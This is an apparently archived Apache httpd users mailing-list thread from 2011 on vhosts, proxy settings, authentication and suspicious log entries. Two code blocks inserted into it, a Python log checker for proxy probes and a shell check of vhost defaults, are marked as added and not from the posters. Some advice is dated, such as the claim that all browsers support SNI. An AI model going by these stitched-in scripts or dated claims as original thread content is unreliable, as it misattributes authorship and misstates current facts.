2> /Use name based virtual hosts to separate the requests ?/

Can you please give me hint considering three diff. website? How 
to use /name based virtual hosts to separate the requests ?/



http://httpd.apache.org/docs/2.2/vhosts/


--
J.



Re: [users@httpd] Re: Domain Registrant's Details

2011-02-05 Thread Jeroen Geilman

On 2/5/11 5:56 AM, DW wrote:
Thanks Mike for your quick reply.  Is it easy to transfer the domain 
to my company?  Will the registrar ask many questions and corporate 
documentations?


It's relatively easy but still requires a written agreement from the 
owner or legal representative of the domain, and detailed WHOIS info for 
the new owner.



The reason I am asking this is somebody came to my place earlier today 
to ask about training courses.  I thought it should have been easier 
to browse the web and get the info and now I am concerned about this.


What does that even have to do with domain registration ?


--
J.





Re: [users@httpd] Content Encoding Error :-

2011-02-13 Thread Jeroen Geilman

On 02/12/2011 06:27 AM, Tushar Chavan wrote:

Hi Team,

Below is my configuration :

ProxyPass   /irj http://idstrn:5/irj
ProxyPassReverse   /irj http://idstrn:5/irj

But when I execute http://Apache _host/irj

1> I get blank page in internet explorer
2> I get below error in Firefox.

Content Encoding Error
The page you are trying to view cannot be shown because it uses an 
invalid or unsupported form of compression.


Please let me know what could be the reason.



What does the apache log have to say about it ?

You need to determine whether it is apache or whatever you proxy to that 
is causing the issue.


--
J.



Re: [users@httpd] Domain Ownership Certificate - .COM registrations

2011-02-13 Thread Jeroen Geilman

On 02/12/2011 03:55 AM, DW wrote:
Does anybody know whether .com registrations allow you to have "Domain 
ownership certificate" for free?  For .co.uk domains, one can download 
the certificates from Nominet (UK's domain names managers & 
registrars) but I don't know if there is anything like that for .com 
domains (from ICANN I guess).  Even for .ru domains you get certificates.


Thanks.



What use does this serve ?

If it's to show to somebody, that's up to the registrar.

If it's to prove your online credentials, you prove those when somebody 
ends up at your web site.


If it's for encryption and validation purposes, those are never free.


--
J.



Re: [users@httpd] suspicious proxy(?) URLs in logs

2011-03-12 Thread Jeroen Geilman

On 03/10/2011 02:16 PM, Rob De Langhe wrote:

hi,

while going occasionally through the access logs of a 2.2.17 Apache 
server, I noticed some URLs of remote locations where my server would 
have made a GET for ?!


an example:

194.0.122.134 - - [10/Mar/2011:02:26:55 +0100] "GET 
http://www.ebay.com/ HTTP/1.1" 200 240 "-" "Mozilla/4.0 (compatible; 
MSIE 4.01; Windows 95)"


So the status code = 200 indicates that the server allowed that URL 
"http://www.ebay.com" for the client 
194.0.122.134 ...


And a Windows 95 client running IE4. Seriously.



I suspected that proxy functionality (enabled by default for long, 


Incorrect. ProxyRequests has never been On by default in any apache 
version that supports it.


The documentation clearly states that this is a security risk:

http://httpd.apache.org/docs/2.2/mod/mod_proxy.html#proxyrequests


but luckily in this 2.2.17 version it is not enabled by default in the 
configs), so I checked the loaded modules :


# /usr/apache2/bin/apachectl -t -D DUMP_MODULES | grep -i prox
#

so none.

Which other module or config setting could have as effect that my 
server accepts such requests ?


You need to provide more context - what distro is this ?
Did you install a package or compile it yourself ?
What does the error log say ?
What other modules are loaded ?


--
J.



Re: [users@httpd] suspicious proxy(?) URLs in logs

2011-03-13 Thread Jeroen Geilman

On 03/13/2011 01:53 AM, Eric Covener wrote:

On Thu, Mar 10, 2011 at 8:16 AM, Rob De Langhe
  wrote:
   

hi,

while going occasionally through the access logs of a 2.2.17 Apache server,
I noticed some URLs of remote locations where my server would have made a
GET for ?!

an example:

194.0.122.134 - - [10/Mar/2011:02:26:55 +0100] "GET http://www.ebay.com/
HTTP/1.1" 200 240 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"

So the status code = 200 indicates that the server allowed that URL
"http://www.ebay.com" for the client 194.0.122.134 ...
 

This doesn't necessarily mean it was proxied.  Requests of this type
will just be served from your default (first-listed) vhost for
whatever iface it was received on.
   

...and was received by an application that accepts wildcard requests.

Any existing (and non-matching) content will simply 404 it.

Whether or not the application that blindly accepted it will try to 
retrieve the URL is a legitimate concern, but it would mean he is 
already running very dubious software.




--
J.
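
An added example for this thread (not from any of the posters): a Python check that picks proxy-style requests (absolute-URI targets for foreign hosts, and CONNECT) out of an access log and, following the point above that such requests may simply be served by the default vhost, compares status and size against ordinary local requests for the same path. The first sample line is the one quoted in the thread; the other lines, the local host names and all function names are constructed assumptions, and the size match is a heuristic, not proof.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Common/combined log format up to the byte count; trailing fields are ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Return (client, method, target, status, size) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split()
    if len(parts) < 2:
        return None
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return m.group("client"), parts[0].upper(), parts[1], int(m.group("status")), size

def classify(method, target, local_names):
    """Return (kind, path): how the request target addresses the server."""
    if method == "CONNECT":
        return "connect", ""
    if target.startswith("/") or target == "*":
        return "origin", target.split("?", 1)[0]
    try:
        url = urlsplit(target)
        host = (url.hostname or "").lower()
    except ValueError:
        return "other", ""
    if url.scheme and host:
        kind = "absolute-local" if host in local_names else "absolute-foreign"
        return kind, url.path or "/"
    return "other", ""

def find_proxy_probes(lines, local_names):
    """List proxy-style requests with a verdict for each."""
    records, local_responses = [], defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, method, target, status, size = parsed
        kind, path = classify(method, target, local_names)
        records.append((client, method, target, status, size, kind, path))
        if kind in ("origin", "absolute-local"):
            local_responses[path].add((status, size))
    findings = []
    for client, method, target, status, size, kind, path in records:
        if kind not in ("connect", "absolute-foreign"):
            continue
        if status >= 400:
            verdict = "refused"
        elif kind == "absolute-foreign" and (status, size) in local_responses.get(path, ()):
            # Same status and size as a local hit on this path: most likely
            # the default vhost's own page, not fetched remote content.
            verdict = "answered-with-local-content"
        else:
            verdict = "answered-investigate"
        findings.append({"client": client, "method": method, "target": target,
                         "status": status, "size": size, "verdict": verdict})
    return findings

LOCAL_NAMES = {"www.example.org", "example.org"}   # assumed names of this server

SAMPLE_LOG = [
    # Quoted in the thread:
    '194.0.122.134 - - [10/Mar/2011:02:26:55 +0100] "GET http://www.ebay.com/ HTTP/1.1" 200 240 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"',
    # Constructed lines:
    '192.0.2.10 - - [10/Mar/2011:02:27:01 +0100] "GET / HTTP/1.1" 200 240 "-" "ExampleBrowser/1.0"',
    '192.0.2.44 - - [10/Mar/2011:02:30:12 +0100] "CONNECT mail.example.net:25 HTTP/1.0" 405 312 "-" "-"',
    '198.51.100.7 - - [10/Mar/2011:02:31:40 +0100] "GET http://www.example.org/page HTTP/1.1" 200 1520 "-" "ExampleBrowser/1.0"',
    '198.51.100.9 - - [10/Mar/2011:02:33:02 +0100] "GET http://proxy-check.example.com/ip HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.5 - - [10/Mar/2011:02:35:47 +0100] "GET http://probe.example.net/check HTTP/1.1" 200 18234 "-" "-"',
]

if __name__ == "__main__":
    for f in find_proxy_probes(SAMPLE_LOG, LOCAL_NAMES):
        print(f'{f["client"]:15s} {f["status"]} {f["size"]:6d} {f["verdict"]:28s} {f["method"]} {f["target"]}')
```

Only the "answered-investigate" rows call for a closer look at the configuration and at what was actually returned.
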





Re: [users@httpd] Directories Being Probed Even When Index Listing Denied

2011-03-19 Thread Jeroen Geilman

On 03/19/2011 11:09 PM, ASAI wrote:

Greetings,

I am hosting a domain with no website which is a gateway for several 
applications.  Directory indexes are turned off, however I noticed in 
the logs today that one of the directories which has no reference to the 
outside world was probed.  Is it possible that one can get the 
directory listing of a host even when index listing is turned off 
through some other agency?


How do I guard against things like this?


You'd have to provide sufficient proof that that is what is happening.
Apache does not log whether a directory listing was retrieved, or a 
normal file - so how do you KNOW this ?



--

J.





Re: [users@httpd] reverse proxy based on user agent

2011-03-24 Thread Jeroen Geilman

On 03/24/2011 05:14 PM, Carlos del Castillo wrote:

Hello everyone, I have a web server that is load balancing two tomcat servers 
using the proxy module, all is working well but now I need to add a third one, 
but we need to send very specific user_agents to that third server. The URLs 
must be the same.

Right now my configuration looks like this:


ProxyRequests Off
ProxyVia Off
ProxyPreserveHost On


Order deny,allow
Allow from all



BalancerMember ajp://server1:8009 route=as1 loadfactor=50
BalancerMember ajp://server2:8009 route=as2 loadfactor=50



ProxyPass / balancer://cluster/ stickysession=JSESSIONID
ProxyPassReverse / balancer://cluster/

I've been looking at the mod_rewrite module, but I'm not sure how I could add 
the third server and only send the specific user agents to that server.
   


This can be done fairly easily using a rewritecond:

RewriteCond %{HTTP_USER_AGENT} /some/matching/regex/
RewriteRule / ajp://server3:8009/ [P]

HOWEVER, this cannot be done inside the context of your balancer - 
unless you do all three this way.

So you lose the sessionID.

http://httpd.apache.org/docs/current/mod/mod_rewrite.html

--
J.





Re: [users@httpd] Directories Being Probed Even When Index Listing Denied

2011-03-29 Thread Jeroen Geilman

On 03/21/2011 03:28 AM, aaron...@comcast.net wrote:
If a PHP Shell can be uploaded. http://phpshell.sourceforge.net/ Then 
any thing www-data can do so can the shell user, As stated in my post 
about virtual hosts seeing each others document roots.


If you post the root password on your website, then anybody can bring 
the machine down.

It's not very useful to do so, however.



- Original Message -
From: "ASAI" 
To: users@httpd.apache.org
Sent: Saturday, March 19, 2011 6:09:51 PM
Subject: [users@httpd] Directories Being Probed Even When Index 
Listing Denied


Greetings,

I am hosting a domain with no website which is a gateway for several
applications.  Directory indexes are turned off, however I noticed in
the logs today that one of the directories which has no reference to the
outside world was probed.  Is it possible that one can get the directory
listing of a host even when index listing is turned off through some
other agency?

How do I guard against things like this?





--
J.



Re: [users@httpd] Re: What are accept.lock files?

2011-05-10 Thread Jeroen Geilman

On 05/10/2011 07:10 PM, Steven Ross wrote:

Trying one more time. Does anyone know?


On May 7, 2011, at 14:16 , Steven Ross wrote:

I'm running the pre-installed Apache 2 on my Mac OS X 10.5.8 machine. 
The log directory (where it writes error and access logs) is at:

/private/var/log/apache2/

The directory is filled with files like accept.lock.x where x is a 
number between 2 and 5 digits. They are all zero bytes long and date 
back many years.


What are they and can I delete all those empty files?


http://httpd.apache.org/docs/2.2/mod/mpm_common.html#lockfile

--
J.





Re: [users@httpd] Problem with Files and Auth?

2011-05-12 Thread Jeroen Geilman

On 05/12/2011 07:45 PM, Knute Johnson wrote:
I'm trying to use the Files directive to force auth for the index.html 
file and I'm getting the following error message if I don't specify 
the file name in the request.  If I do it works fine.


Authorization Required

This server could not verify that you are authorized to access the 
document requested. Either you supplied the wrong credentials (e.g., 
bad password), or your browser doesn't understand how to supply the 
credentials required.


No username/password dialog is presented with this error, just the error.

Any ideas?


Your browser does not understand how to supply the credentials required.


--
J.





Re: [users@httpd] Adwords reports 3 times as many 'clicks' as the server log shows served.

2011-05-13 Thread Jeroen Geilman

On 05/13/2011 09:16 PM, Xavier Gallagher wrote:

Dear Everyone,

I am currently in debate with Google Adwords about the clicks I am
being charged for.

The issue is simple.  I have  specific landing pages for my Adwords adverts.

My server logs show the landing page served 125 times, Adwords reports
360 'clicks'.

There should be a 1-to-1 mapping as far as I am concerned.  If the
landing page was not requested, then the click, valid or not never
reached the server.

Could a caching proxy server be causing the difference?

I repeated the experiment with a new site.  7 clicks, but only two
reported HTTP GET requests to the landing page.

Does anyone have a similar experience? or explanation?

I have searched for answers, but I only get Adwords vs Analytics
answers, and I don't use AWstats.

I retrieve my logs via cpanel, if that is relevant.

Any help gratefully received.

Thanks

Xavier



It will be very difficult to provide assistance without any form of hard 
data.


You'd need to look at real server logs - not something dished up by a 
crapanel.





--
J.





Re: [users@httpd] question maybe conceptual on virtual hosting

2011-05-13 Thread Jeroen Geilman

On 05/13/2011 06:50 AM, David Mehler wrote:

Hello,
I've got a question on virtual hosts. I'm running httpd 2.2.3 on a
rhel5 machine. I believe from what I've read that when one sets up a
virtual host that the Listen and other directives in httpd.conf are no
longer valid.


Listen may only be used in the server context. It is invalid in a 
virtualhost context.



  First of all, did I get that right? I've got a Listen
line in httpd.conf telling apache to listen to a single address,



Listen tells apache what PORT to listen on, first of all.
If your distro did not pre-set this (they did), set it to Listen 80 for 
normal HTTP.
You may repeat it as often as required, for SSL (443), or per-IP 
(127.0.0.1:80) or any combination thereof.




  I've
also got a



Order Deny,Allow
Deny from all
Options none
AllowOverRide none


in that file as well as a block pointing to apache's document root
area. In my virtual host configuration file I've got the virtual host
set up with a different document root area, my question is is the
  block from the httpd.conf file still propagated to the
virtual host configuration file or do I have to define that  block in the virtual hosts as well? I hope that made sense.


No, do not repeat Directory /.
Yes, all settings that can be inherited, are inherited.


Thanks.
Dave.



Where is the conceptual question ?


--
J.





Re: [users@httpd] question maybe conceptual on virtual hosting

2011-05-13 Thread Jeroen Geilman

On 05/14/2011 01:13 AM, David Mehler wrote:

Hello,

Thank you for your reply. From what you're telling me the below is
wrong. Is the only correction I have to make the elimination of the
duplicate  sections in the virtual hosts or do I have to
take out more?



An SSL NameVirtualHost will only function under specific circumstances.
Odds are you don't meet or need these.
Other than that, yes, that's all.


Thanks.
Dave.

# httpd.conf
# location of the web server tree
DocumentRoot "/var/www/html"

# Configure Directory Security

 Order Deny,Allow
 Deny from all
Options None
AllowOverride None


 Order Allow,Deny
 Allow from all


# Set up Name Virtual Hosts on the default http and https ports
NameVirtualHost *:80
NameVirtualHost *:443

# vhost.conf
#
# Virtual host file
#

# The default (Catch all) Virtual host.

 ServerName default
 DocumentRoot /var/www/html
 ErrorDocument 404 /index.html

Order Deny,Allow
Deny from all
Options none
AllowOverRide none


Order Allow,Deny
Allow from all
Options none
AllowOverRide none



# The example.com http virtual host

  ServerAdmin webmas...@example.com
  ServerName example.com
  ServerAlias www.example.com
  DocumentRoot /srv/www/example.com/public_html
  ErrorLog /srv/www/example.com/logs/error_log
  CustomLog /srv/www/example.com/logs/access_log common

Order Deny,Allow
Deny from all
Options none
AllowOverRide none


Order Allow,Deny
Allow from all
Options none
AllowOverRide none




On 5/13/11, Jeroen Geilman  wrote:

On 05/13/2011 06:50 AM, David Mehler wrote:

Hello,
I've got a question on virtual hosts. I'm running httpd 2.2.3 on a
rhel5 machine. I believe from what I've read that when one sets up a
virtual host that the Listen and other directives in httpd.conf are no
longer valid.

Listen may only be used in the server context. It is invalid in a
virtualhost context.


   First of all, did I get that right? I've got a Listen
line in httpd.conf telling apache to listen to a single address,


Listen tells apache what PORT to listen on, first of all.
If your distro did not pre-set this (they did), set it to Listen 80 for
normal HTTP.
You may repeat it as often as required, for SSL (443), or per-IP
(127.0.0.1:80) or any combination thereof.



   I've
also got a



Order Deny,Allow
Deny from all
Options none
AllowOverRide none


in that file as well as a block pointing to apache's document root
area. In my virtual host configuration file I've got the virtual host
set up with a different document root area, my question is is the
   block from the httpd.conf file still propagated to the
virtual host configuration file or do I have to define that   block in the virtual hosts as well? I hope that made sense.

No, do not repeat Directory /.
Yes, all settings that can be inherited, are inherited.


Thanks.
Dave.


Where is the conceptual question ?


--
J.









--
J.





Re: [users@httpd] Need advice to choose a configuration

2011-05-22 Thread Jeroen Geilman

On 05/22/2011 05:43 PM, Isaac XxX wrote:

Hi folks,

I have to move some sites (10) from virtual hosts to a single 
dedicated machine. The number of sites will grow on time.


I've two ways to implement it:
1. set a single apache instance to serve all sites configuring a 
single apache virtual host for each one


Yes.

2. set some virtual servers (with xen for example) and install on each of 
them a single apache, serving one or few sites. The root partition 
could have a single apache or nginx doing the load balance task. Of 
course, all virtual servers will be on the same dedicated machine


This will consume much more resources.



Which way do you think is better? (performance, maintenance structure, 
scalability...)


Thanks a lot



--
J.





Re: [users@httpd] Need advice to choose a configuration

2011-05-22 Thread Jeroen Geilman

On 05/22/2011 09:42 PM, Macks, Aaron wrote:

the only reasons I'd possibly suggest #2 are:
1.  multiple SSL certs, it is still not easy to have multiple SSL certs on a 
single system, you either need to setup multiple IP addresses for that box or 
run on multiple virtualservers


All modern browsers now support Server Name Indication (SNI), which 
allows you to run SSL vhosts.



2.  If you expect the business to get HUGE for some of the sites, then you can 
spin up more VServers for only the sites that need to handle more traffic... 
Then you're probably talking about dedicated loadbalancers and much more 
hardware anyway

so barring those 2 conditions, I agree 100% with Jeroen that #1 is the way to go

a
--
Aaron Macks
Sr. Unix Systems Engineer

Harvard Business Publishing
300 North Beacon St.|   Watertown, MA 02472
(617) 783-7461|   Fax: (617) 783-7467
www.harvardbusiness.org |   Cell:(978) 317-3614

On May 22, 2011, at 12:54 PM, Jeroen Geilman wrote:


On 05/22/2011 05:43 PM, Isaac XxX wrote:

Hi folks,

I have to move some sites (10) from virtual hosts to a single dedicated 
machine. The number of sites will grow on time.

I've two ways to implement it:
1. set a single apache instance to serve all sites configuring a single apache 
virtual host for each one

Yes.


2. set some virtual servers (with xen for example) and install on each of them a 
single apache, serving one or few sites. The root partition could have a single 
apache or nginx doing the load balance task. Of course, all virtual servers 
will be on the same dedicated machine

This will consume much more resources.


Which way do you think is better? (performance, maintenance structure, 
scalability...)

Thanks a lot


--
J.









--
J.





Re: [users@httpd] Files and DirectoryIndex conflict?

2011-05-28 Thread Jeroen Geilman

On 05/28/2011 08:51 PM, Knute Johnson wrote:
I'm having a problem using the Files directive to require 
authentication on the index.html file.  It doesn't work if it is 
requested with the index URL but does if the URL specifies the file 
directly.  I can't believe that I'm the only person ever to try to do 
this but maybe I am.


So if I request http://localhost/ I get the following error and NO 
user name/password dialog.


401 Authorization Required

Authorization Required

This server could not verify that you are authorized to access the 
document requested. Either you supplied the wrong credentials (e.g., 
bad password), or your browser doesn't understand how to supply the 
credentials required.


But if I request http://localhost/index.html I get the Authentication 
Required dialog and can enter the user name and password and then 
receive the file.


I've tested this with FireFox and Chrome.  I'm running Ubuntu 10.10 
and apache 2.2.16.


Here is the access log from the first request

127.0.0.1 - - [28/May/2011:11:31:16 -0700] "GET / HTTP/1.1" 401 618 
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) 
Gecko/20110422 Ubuntu/10.10 (maverick) Firefox/3.6.17"


and the access log from the second request

127.0.0.1 - knute [28/May/2011:11:30:12 -0700] "GET /index.html 
HTTP/1.1" 200 485 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; 
rv:1.9.2.17) Gecko/20110422 Ubuntu/10.10 (maverick) Firefox/3.6.17"


The error.log is empty.


That is not possible; a 4xx error is always logged in the error log.




Here is the virtual host configuration file


ServerAdmin webmaster@localhost

DocumentRoot /var/www




Options FollowSymLinks
AllowOverride None



This does not belong in a vhost.



Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
# added for testing
# any files require group any membership

Requests that hit DirectoryIndex hit this resource block


AuthType Basic
AuthName "ARCLA Lookers"
AuthUserFile /usr/local/apache/passwords/arcla.pwd
AuthGroupFile /usr/local/apache/passwords/groups
Require group lookers players honchos


However, requests for the exact file resource hit this resource block.




ErrorLog ${APACHE_LOG_DIR}/error.log



Apache will refuse to run when it cannot write to the error log, so you 
are likely not looking at the right one.





  DirectoryIndex index.html index.cgi index.pl index.php 
index.xhtml index.htm


THIS is the reason the requests behave differently.



--
J.





Re: [users@httpd] Special configuration for requests that do not match any particular virtual host? Apache 2.2

2011-06-01 Thread Jeroen Geilman

On 06/02/2011 01:05 AM, Geoff Millikan wrote:

I want to make a catch-all virtual host (like the manual mentions below) which 
redirects any errant hostnames like
http://oopsie.mydomain.com/ to our main hostname at http://www.mydomain.com/   
But the below example doesn't work - I'm getting an
infinite redirect from http://www.mydomain.com/ right back to 
http://www.mydomain.com/

What am I missing?

#First virtual host entry

RewriteEngine On
RewriteRule .* http://www.mydomain.com%{REQUEST_URI} [L,R=301]
ErrorLog    /var/log/httpd/error_log
CustomLog   /var/log/httpd/access_log combined



NO.

nonononono.

Get rid of all the rewrite junk and just set a dummy servername; this 
will catch ALL undefined hostnames.


Then Redirect / to the correct vhost.


--
J.
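
A check for the setup described in the reply above, as an added example that is not part of the original message: Apache sends any request whose Host header matches no vhost to the first vhost listed for that address and port, so if the canonical name has no vhost of its own, a redirect-everything default sends it back to itself. The script reads `httpd -S` output; the sample dump, `catchall.invalid` and the file paths are constructed, and only ServerName entries are considered.

```shell
#!/bin/sh
# Constructed `httpd -S` output in Apache 2.2 format; names and paths are made up.
sample_dump() {
    cat <<'EOF'
VirtualHost configuration:
wildcard NameVirtualHosts and _default_ servers:
*:80                   is a NameVirtualHost
         default server catchall.invalid (/etc/httpd/conf.d/vhosts.conf:2)
         port 80 namevhost catchall.invalid (/etc/httpd/conf.d/vhosts.conf:2)
         port 80 namevhost www.mydomain.com (/etc/httpd/conf.d/vhosts.conf:8)
Syntax OK
EOF
}

# default_server LISTENER: name of the vhost that answers unmatched Host headers
default_server() {
    awk -v l="$1" '
        / is a NameVirtualHost$/ { cur = $1 }
        cur == l && $1 == "default" && $2 == "server" { print $3; exit }'
}

# has_namevhost LISTENER NAME: succeeds if NAME has its own vhost on LISTENER
has_namevhost() {
    awk -v l="$1" -v n="$2" '
        / is a NameVirtualHost$/ { cur = $1 }
        cur == l && $3 == "namevhost" && $4 == n { found = 1 }
        END { exit !found }'
}

# check_catchall LISTENER CANONICAL, with `httpd -S` output on stdin.
# Assumes the default vhost redirects everything to CANONICAL. Fails when
# requests for CANONICAL would land in that default vhost and loop.
check_catchall() {
    dump=$(cat)
    def=$(printf '%s\n' "$dump" | default_server "$1")
    if [ "$def" = "$2" ]; then
        echo "LOOP: $2 is the default server on $1"
        return 1
    fi
    if ! printf '%s\n' "$dump" | has_namevhost "$1" "$2"; then
        echo "LOOP: $2 has no vhost on $1 and falls through to $def"
        return 1
    fi
    echo "OK: unmatched hosts go to $def, $2 has its own vhost"
}
```

On a live server the input comes from `httpd -S 2>&1 | check_catchall '*:80' www.mydomain.com`.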





Re: [users@httpd] url rewrite

2011-06-01 Thread Jeroen Geilman

On 06/01/2011 10:33 PM, Friedrich Locke wrote:

Hi list users,

this is my first post on this mailing list. My doubt is the following:

Is it possible to redirect a document root based on the site address
like in a template manner without having to configure for each virtual
system ?

I mean this:

Access to http://x.y.z/abc.html should be mapped to documentroot
/var/web/x.y.z/abc.html ? but without having to set each mapping?



Yes; use mass virtual hosting:

VirtualDocumentRoot /var/web/%0/



--
J.





Re: [users@httpd] publishing a content across two network

2011-06-02 Thread Jeroen Geilman

On 06/02/2011 10:43 AM, Ravi Chandran wrote:

hi all,
I have recently downloaded apache http server 2.2, I had published 
some content for a project and it's working also. Now my requirement is 
that this published content should be available across two networks. 
So for start, I want to make this content available on a LAN and WIFI 
network. How can I configure it? My LAN IP as 192.168.1.XXX and WIFI 
IP is 10.XX.XX.XX.  Do I have to set the virtualhost settings?




That's way too vague to answer usefully, but if these networks talk to 
each other, set up the appropriate routes and you're good.



--
J.





Re: [users@httpd] publishing a content across two network

2011-06-02 Thread Jeroen Geilman

On 06/02/2011 12:35 PM, Ravi Chandran wrote:

hi,


Please don't top-post.

thanks for replying. Actually we have two systems one on WIFI and one 
on LAN, both are running apache web server. 


Okay, so we are talking about TWO completely separate apache installations ?
That wasn't entirely clear before.

I am able to access the content published on the other system using 
browser. 


Okay.

but the same thing is not happening at the other system. 


What "same thing" ? Apache is not working correctly at the second system 
? What does the error log say ?



I mean on that system, the content is not coming, it's giving timeout.



Ah, then you most likely have a network problem.



So I am confused as to why one directional traffic is there?



"Directional" ? HTTP is a TCP protocol, there is always two-directional 
traffic.



If I am able to see the content on that system, they should also be 
able to see my content, right?


No, wrong.

Why would they ? the systems are entirely unrelated.

We have the same setup and configuration info other than the domain 
and server name..


Investigate the network, and read the apache error logs for obvious 
network-related problems.





--
Thanks & Regards
Ravi




--
J.



Re: [users@httpd] publishing a content across two network

2011-06-02 Thread Jeroen Geilman

On 06/02/2011 01:00 PM, Ravi Chandran wrote:
K, first of all I don't understand the meaning of "Top Post". Can you 
specify in layman's term?


It means post your replies either at the bottom of the previous message, 
or in-line, below the section you are replying to.
Also, please attribute your responses, as this makes it easier for 
people to correlate the messages.




second, the focus of this question is only for one Apache 
installation, as the other one is working fine, so we don't even need 
to bother about it..


Then why did you mention it ?



thirdly, "Same thing" means, seeing the content published on the other 
system from my browser  and apache is working perfectly, as I am 
able to see the content on my system... no errors shown anywhere...


What "other system" ? A client computer with a browser ? Another server ?



fourthly, timeout issue is because the content is not reachable, that 
is what I wanted to know why it's not reachable, only for one system.


And we should guess ?
What does the error log say. 2x.



fifthly, "directional" was in logical sense. content of system 1 
accessible on system 2, but not vice versa. agreed that systems are 
purely unrelated to each other. But how will you explain me getting 
the data from other system and they not able to do so?


I'm not going to try.
You may have network issues, or access controls in place, or firewall 
rules, or broken software.


Too many possible reasons - you need to narrow them down.


--
J.





Re: [users@httpd] how many directives can you have?

2011-06-03 Thread Jeroen Geilman

On 06/03/2011 02:32 PM, Tommy Peterson wrote:

Yes. Here is what I had to start with


Please don't top-post.



AuthType shibboleth
ShibRequireSession On
ShibUseHeaders On
require shibboleth




LocationMatch cannot match a query string, you need a rewriterule for that.
From the documentation:

For all origin (non-proxy) requests, the URL to be matched is a URL-path 
of the form /path/. No scheme, hostname, port, or query string may be 
included.


   AuthType shibboleth
ShibRequireSession On
ShibUseHeaders On
require shibboleth




If any of these ALSO have a physical directory, the result is less 
clear-cut.


Authentication should be performed on physical directories whenever 
possible.



--
J.



Re: [users@httpd] need some thoughts on trouble shooting httpd server hangup

2011-06-03 Thread Jeroen Geilman

On 06/03/2011 10:12 PM, Zaccone, Warren wrote:
Have a problem where httpd server 2.2.15 stops responding to requests 
requiring server to be frequently restarted that has me going in 
circles. I was looking for some direction as to how to pursue.
there are 8 workers running each consuming very little cpu. 
netstat shows process listening on port 80 and 443.
requests on 443 are served fine, but requests on 80 hang,  Backed out 
2.2.15 and went to previous release I had built (httpd 2.2.11) and 
problem has gone away.  No other variables changed, and they were 
built same way, so I am wondering if there was a change in behavior 
between the releases that I have not anticipated or if there is a bug 
that may have been fixed subsequently.   I am testing 2.2.19 in my lab 
without issues, but 2.2.15 is in production so I need to determine the 
cause.
the requests are 99% php scripts with a fair number using web services 
with nusoap.  However I think the issue may be httpd itself because 
port 443 works fine, but port 80 does not respond.  Initially both 
ports are functioning and over time, (a few hours), requests on port 
80 (http) stop responding but 443 (https) remains fine. restarting 
httpd fixes it for a few hours.

I appreciate any thoughts or direction.
thank you.
Warren


It can depend on many things.

Are you running PHP scripts on 443 as well ? The same scripts ?

Or are you running way more on port 80, how much traffic is each port 
serving ?


Examine server-status output thoroughly when this starts to happen.



I compiled it as
Apache/2.2.15 (Unix) PHP/5.2.14 mod_ssl/2.2.15 OpenSSL/0.9.8o
   apachectl -V
apache bin directory is /usr/local/apache/bin
httpd is /usr/local/apache/bin/httpd
Server version: Apache/2.2.15 (Unix)
Server built:   Jul 22 2010 16:52:18
Server loaded:  APR 1.3.3, APR-Util 1.3.4
Compiled using: APR 1.3.3, APR-Util 1.3.4
Architecture:   32-bit
Server MPM: Prefork
  threaded: no
forked: yes (variable process count)
Server compiled with
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_FCNTL_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/usr/local/apache"
 -D SUEXEC_BIN="/usr/local/apache/bin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="logs/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"
$


A lot more helpful would be the output from httpd -S, and an indication 
of the types of content on each port.


Also, try to reproduce it by running ab or something like it, keeping 
an eye on extendedstatus.



--
J.



Re: [users@httpd] What triggers AUTH_TYPE to show up?

2011-06-07 Thread Jeroen Geilman

On 06/07/2011 10:21 PM, Tommy Peterson wrote:


If I have the following Location directive and in the headers the Auth 
Type shows up accordingly it says [AUTH_TYPE] => shibboleth




  AuthType shibboleth

  ShibRequireSession On

  ShibUseHeaders On

  Require shibboleth



What triggers the "AUTH_TYPE" header variable to show up?

I have another  directive for another directory. It is 
locked down with the log in prompt as above and the headers show up 
the problem is that that AUTH_TYPE=> shibboleth doesn't show up. It is 
the only difference. I know it authenticated as the header also shows 
the attributes.


So I am confused as to why this one variable (AUTH_TYPE) isn't showing 
up.


And there is not "AUTH TYPE not set " in the log or anything else 
referencing the AUTH TYPE.


Any thoughts?




You'll have to show the complete config, and relevant logs - both access 
and error.



--
J.



Re: [users@httpd] Apache 2.2 connections full

2011-06-07 Thread Jeroen Geilman

On 06/07/2011 10:59 PM, Rob Morin wrote:


Hello all was not sure how to word my subject line...

I posted a few weeks back on how could I increase performance of 
apache... I received quite a few replies and they all helped a bit...


We even added an additional server to our server cluster to total 7 
web servers now, all load balanced by HAProxy


We currently receive about 14 million impressions a day to about 60 
different domains/websites


Our hosting provider uses HAProxy, rather than an appliance, I assume 
to reduce costs. However I feel like these HAProxy machines are not 
reliable at all... Well not under the supervision of our hosting 
company, anyways... :)


On to my questions

During peak hours, like a few mins ago, all of our web servers became 
high in load, like close to 100! We still had plenty of RAM left and 
for sure there was no swapping




So what was the cause of the load ?

Examine dstat output while the load spikes and see if there is a high 
percentage spent in IOWait.


Apache does ultimately serve content from disk; is your disk subsystem 
up to the task ?


